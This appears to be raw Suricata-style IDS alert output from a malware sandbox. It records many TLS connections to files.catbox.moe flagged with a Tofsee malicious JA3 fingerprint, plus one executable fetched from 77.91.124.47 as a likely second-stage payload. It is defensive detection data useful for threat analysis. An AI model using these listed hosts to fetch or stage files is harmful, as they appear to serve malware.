TCP 192.168.56.103:49323 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49417 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49417 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49343 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49417 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49343 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49291 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49417 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49421 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49421 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49421 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49343 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49422 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49422 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49323 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49422 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49421 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49354 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49354 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49326 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49326 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49423 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49326 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49423 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49354 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49423 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49422 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49354 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49327 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49327 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49327 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49434 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49434 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49434 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49328 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49328 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49359 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49328 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49359 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49435 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49435 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49359 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49435 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49434 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49330 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49330 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49330 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49330 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49444 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49331 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49331 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49331 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49332 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49332 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49332 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49444 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49444 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49347 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49347 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49347 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49450 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49450 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49450 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49349 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49349 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49349 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49455 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49455 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49455 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49455 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49457 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49457 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49457 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49366 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49366 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49457 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49366 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49379 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49379 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49379 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49360 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49360 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49462 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49462 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49385 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49462 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49385 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49291 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49466 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49360 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49385 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49299 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49299 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49389 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49362 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49389 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49362 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49389 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49362 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49264 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 77.91.124.47:80 -> 192.168.56.103:49181	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49264 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 77.91.124.47:80 -> 192.168.56.103:49181	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49299 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49394 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49367 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49394 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49367 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49299 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49394 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49367 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49304 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49368 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49304 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49400 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49368 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49400 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49304 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49400 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49368 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49304 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49367 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49405 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49405 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49308 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49308 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49405 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49372 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49308 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49372 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49311 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49311 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49311 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49372 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49313 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49313 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49313 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49317 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49317 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49317 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49466 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49319 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49319 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49466 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49319 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49485 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49485 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49264 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49485 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49265 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49265 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49495 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49495 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49265 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49495 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49264 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49265 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49275 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49275 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49275 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49278 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49278 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49278 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49499 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49499 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49499 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49281 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49281 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49281 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49500 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49500 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49500 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49289 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49499 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49289 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49289 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49407 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49407 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49290 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49407 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49290 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49503 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49290 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49416 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49416 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49292 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49503 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49416 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49292 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
